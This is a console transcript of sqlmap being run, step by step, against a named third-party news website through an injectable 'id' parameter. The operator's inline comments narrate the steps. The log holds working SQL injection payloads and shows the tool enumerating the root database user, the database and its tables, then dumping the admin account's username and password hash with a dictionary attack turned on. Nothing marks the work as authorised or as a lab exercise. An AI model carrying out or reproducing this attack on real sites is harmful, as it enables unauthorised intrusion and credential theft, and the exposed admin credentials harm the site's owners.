D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>